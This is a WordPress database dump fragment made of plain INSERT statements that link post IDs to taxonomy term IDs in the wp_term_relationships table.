INSERT INTO `wp_term_relationships` VALUES (425, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (425, 525, 0); 
INSERT INTO `wp_term_relationships` VALUES (427, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (427, 13, 0); 
INSERT INTO `wp_term_relationships` VALUES (427, 406, 0); 
INSERT INTO `wp_term_relationships` VALUES (427, 407, 0); 
INSERT INTO `wp_term_relationships` VALUES (427, 408, 0); 
INSERT INTO `wp_term_relationships` VALUES (427, 409, 0); 
INSERT INTO `wp_term_relationships` VALUES (427, 410, 0); 
INSERT INTO `wp_term_relationships` VALUES (436, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (436, 45, 0); 
INSERT INTO `wp_term_relationships` VALUES (436, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (436, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (436, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (436, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (437, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (437, 45, 0); 
INSERT INTO `wp_term_relationships` VALUES (437, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (437, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (437, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (437, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (438, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (438, 45, 0); 
INSERT INTO `wp_term_relationships` VALUES (438, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (438, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (438, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (438, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (439, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (439, 45, 0); 
INSERT INTO `wp_term_relationships` VALUES (439, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (439, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (439, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (439, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 45, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 140, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 188, 0); 
INSERT INTO `wp_term_relationships` VALUES (440, 189, 0); 
INSERT INTO `wp_term_relationships` VALUES (441, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (441, 45, 0); 
INSERT INTO `wp_term_relationships` VALUES (441, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (441, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (441, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (441, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (442, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (442, 45, 0); 
INSERT INTO `wp_term_relationships` VALUES (442, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (442, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (442, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (442, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (452, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (452, 79, 0); 
INSERT INTO `wp_term_relationships` VALUES (452, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (452, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (452, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (452, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (452, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (456, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (467, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (467, 12, 0); 
INSERT INTO `wp_term_relationships` VALUES (468, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (468, 12, 0); 
INSERT INTO `wp_term_relationships` VALUES (469, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (469, 522, 0); 
INSERT INTO `wp_term_relationships` VALUES (469, 523, 0); 
INSERT INTO `wp_term_relationships` VALUES (473, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (473, 12, 0); 
INSERT INTO `wp_term_relationships` VALUES (474, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (474, 12, 0); 
INSERT INTO `wp_term_relationships` VALUES (489, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (489, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (489, 370, 0); 
INSERT INTO `wp_term_relationships` VALUES (489, 371, 0); 
INSERT INTO `wp_term_relationships` VALUES (489, 372, 0); 
INSERT INTO `wp_term_relationships` VALUES (489, 373, 0); 
INSERT INTO `wp_term_relationships` VALUES (490, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (490, 93, 0); 
INSERT INTO `wp_term_relationships` VALUES (568, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (568, 13, 0); 
INSERT INTO `wp_term_relationships` VALUES (568, 406, 0); 
INSERT INTO `wp_term_relationships` VALUES (568, 407, 0); 
INSERT INTO `wp_term_relationships` VALUES (568, 408, 0); 
INSERT INTO `wp_term_relationships` VALUES (568, 409, 0); 
INSERT INTO `wp_term_relationships` VALUES (568, 410, 0); 
INSERT INTO `wp_term_relationships` VALUES (575, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (575, 13, 0); 
INSERT INTO `wp_term_relationships` VALUES (575, 406, 0); 
INSERT INTO `wp_term_relationships` VALUES (575, 407, 0); 
INSERT INTO `wp_term_relationships` VALUES (575, 408, 0); 
INSERT INTO `wp_term_relationships` VALUES (575, 409, 0); 
INSERT INTO `wp_term_relationships` VALUES (575, 410, 0); 
INSERT INTO `wp_term_relationships` VALUES (577, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (577, 13, 0); 
INSERT INTO `wp_term_relationships` VALUES (577, 406, 0); 
INSERT INTO `wp_term_relationships` VALUES (577, 407, 0); 
INSERT INTO `wp_term_relationships` VALUES (577, 408, 0); 
INSERT INTO `wp_term_relationships` VALUES (577, 409, 0); 
INSERT INTO `wp_term_relationships` VALUES (577, 410, 0); 
INSERT INTO `wp_term_relationships` VALUES (579, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (579, 79, 0); 
INSERT INTO `wp_term_relationships` VALUES (579, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (579, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (579, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (579, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (579, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (580, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (580, 79, 0); 
INSERT INTO `wp_term_relationships` VALUES (580, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (580, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (580, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (580, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (580, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (581, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (581, 79, 0); 
INSERT INTO `wp_term_relationships` VALUES (581, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (581, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (581, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (581, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (581, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (582, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (582, 79, 0); 
INSERT INTO `wp_term_relationships` VALUES (582, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (582, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (582, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (582, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (582, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (583, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (583, 79, 0); 
INSERT INTO `wp_term_relationships` VALUES (583, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (583, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (583, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (583, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (583, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 28, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (620, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 29, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (621, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (622, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (622, 30, 0); 
INSERT INTO `wp_term_relationships` VALUES (623, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (623, 31, 0); 
INSERT INTO `wp_term_relationships` VALUES (623, 378, 0); 
INSERT INTO `wp_term_relationships` VALUES (623, 386, 0); 
INSERT INTO `wp_term_relationships` VALUES (623, 387, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 29, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (637, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (638, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (638, 99, 0); 
INSERT INTO `wp_term_relationships` VALUES (638, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (638, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (638, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (638, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (638, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (642, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (642, 99, 0); 
INSERT INTO `wp_term_relationships` VALUES (642, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (642, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (642, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (642, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (642, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (643, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (643, 99, 0); 
INSERT INTO `wp_term_relationships` VALUES (643, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (643, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (643, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (643, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (643, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (644, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (644, 99, 0); 
INSERT INTO `wp_term_relationships` VALUES (644, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (644, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (644, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (644, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (644, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (645, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (645, 99, 0); 
INSERT INTO `wp_term_relationships` VALUES (645, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (645, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (645, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (645, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (645, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (646, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (646, 100, 0); 
INSERT INTO `wp_term_relationships` VALUES (646, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (646, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (646, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (646, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (646, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (647, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (647, 100, 0); 
INSERT INTO `wp_term_relationships` VALUES (647, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (647, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (647, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (647, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (647, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (648, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (648, 100, 0); 
INSERT INTO `wp_term_relationships` VALUES (648, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (648, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (648, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (648, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (648, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 101, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (649, 114, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 101, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 111, 0); 
INSERT INTO `wp_term_relationships` VALUES (651, 114, 0); 
INSERT INTO `wp_term_relationships` VALUES (652, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (652, 101, 0); 
INSERT INTO `wp_term_relationships` VALUES (652, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (652, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (652, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (652, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (652, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (652, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (653, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (653, 101, 0); 
INSERT INTO `wp_term_relationships` VALUES (653, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (653, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (653, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (653, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (653, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (653, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 101, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (654, 258, 0); 
INSERT INTO `wp_term_relationships` VALUES (655, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (655, 101, 0); 
INSERT INTO `wp_term_relationships` VALUES (655, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (655, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (655, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (655, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (655, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (655, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (656, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (656, 101, 0); 
INSERT INTO `wp_term_relationships` VALUES (656, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (656, 103, 0); 
INSERT INTO `wp_term_relationships` VALUES (656, 104, 0); 
INSERT INTO `wp_term_relationships` VALUES (656, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (656, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (656, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (659, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (659, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (659, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (659, 118, 0); 
INSERT INTO `wp_term_relationships` VALUES (659, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (659, 124, 0); 
INSERT INTO `wp_term_relationships` VALUES (662, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (666, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (670, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (671, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (671, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (671, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (671, 118, 0); 
INSERT INTO `wp_term_relationships` VALUES (671, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (671, 124, 0); 
INSERT INTO `wp_term_relationships` VALUES (672, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (672, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (672, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (672, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (672, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (672, 122, 0); 
INSERT INTO `wp_term_relationships` VALUES (674, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (674, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (674, 110, 0); 
INSERT INTO `wp_term_relationships` VALUES (674, 112, 0); 
INSERT INTO `wp_term_relationships` VALUES (674, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (674, 122, 0); 
INSERT INTO `wp_term_relationships` VALUES (675, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (675, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (675, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (675, 118, 0); 
INSERT INTO `wp_term_relationships` VALUES (675, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (675, 120, 0); 
INSERT INTO `wp_term_relationships` VALUES (675, 121, 0); 
INSERT INTO `wp_term_relationships` VALUES (675, 123, 0); 
INSERT INTO `wp_term_relationships` VALUES (696, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (696, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (696, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (696, 118, 0); 
INSERT INTO `wp_term_relationships` VALUES (696, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (696, 120, 0); 
INSERT INTO `wp_term_relationships` VALUES (696, 121, 0); 
INSERT INTO `wp_term_relationships` VALUES (696, 123, 0); 
INSERT INTO `wp_term_relationships` VALUES (697, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (697, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (697, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (697, 118, 0); 
INSERT INTO `wp_term_relationships` VALUES (697, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (697, 120, 0); 
INSERT INTO `wp_term_relationships` VALUES (697, 121, 0); 
INSERT INTO `wp_term_relationships` VALUES (697, 123, 0); 
INSERT INTO `wp_term_relationships` VALUES (707, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (707, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (707, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (707, 114, 0); 
INSERT INTO `wp_term_relationships` VALUES (707, 116, 0); 
INSERT INTO `wp_term_relationships` VALUES (707, 118, 0); 
INSERT INTO `wp_term_relationships` VALUES (707, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (708, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (708, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (708, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (708, 114, 0); 
INSERT INTO `wp_term_relationships` VALUES (708, 116, 0); 
INSERT INTO `wp_term_relationships` VALUES (708, 118, 0); 
INSERT INTO `wp_term_relationships` VALUES (708, 119, 0); 
INSERT INTO `wp_term_relationships` VALUES (713, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (713, 37, 0); 
INSERT INTO `wp_term_relationships` VALUES (713, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (713, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (713, 125, 0); 
INSERT INTO `wp_term_relationships` VALUES (713, 126, 0); 
INSERT INTO `wp_term_relationships` VALUES (714, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (714, 37, 0); 
INSERT INTO `wp_term_relationships` VALUES (714, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (714, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (714, 125, 0); 
INSERT INTO `wp_term_relationships` VALUES (714, 126, 0); 
INSERT INTO `wp_term_relationships` VALUES (715, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (715, 37, 0); 
INSERT INTO `wp_term_relationships` VALUES (715, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (715, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (715, 125, 0); 
INSERT INTO `wp_term_relationships` VALUES (715, 126, 0); 
INSERT INTO `wp_term_relationships` VALUES (717, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (717, 37, 0); 
INSERT INTO `wp_term_relationships` VALUES (717, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (717, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (717, 125, 0); 
INSERT INTO `wp_term_relationships` VALUES (717, 126, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 28, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (732, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 29, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (733, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 29, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (734, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 27, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (735, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 27, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (736, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 27, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 398, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 400, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 401, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 402, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 403, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 404, 0); 
INSERT INTO `wp_term_relationships` VALUES (738, 405, 0); 
INSERT INTO `wp_term_relationships` VALUES (769, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (769, 96, 0); 
INSERT INTO `wp_term_relationships` VALUES (769, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (769, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (769, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (783, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (783, 96, 0); 
INSERT INTO `wp_term_relationships` VALUES (783, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (783, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (783, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (784, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (784, 96, 0); 
INSERT INTO `wp_term_relationships` VALUES (784, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (784, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (784, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (788, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (788, 96, 0); 
INSERT INTO `wp_term_relationships` VALUES (788, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (788, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (788, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (789, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (789, 96, 0); 
INSERT INTO `wp_term_relationships` VALUES (789, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (789, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (789, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (790, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (790, 96, 0); 
INSERT INTO `wp_term_relationships` VALUES (790, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (790, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (790, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (814, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (814, 96, 0); 
INSERT INTO `wp_term_relationships` VALUES (814, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (814, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (814, 109, 0); 
INSERT INTO `wp_term_relationships` VALUES (818, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (818, 97, 0); 
INSERT INTO `wp_term_relationships` VALUES (818, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (818, 105, 0); 
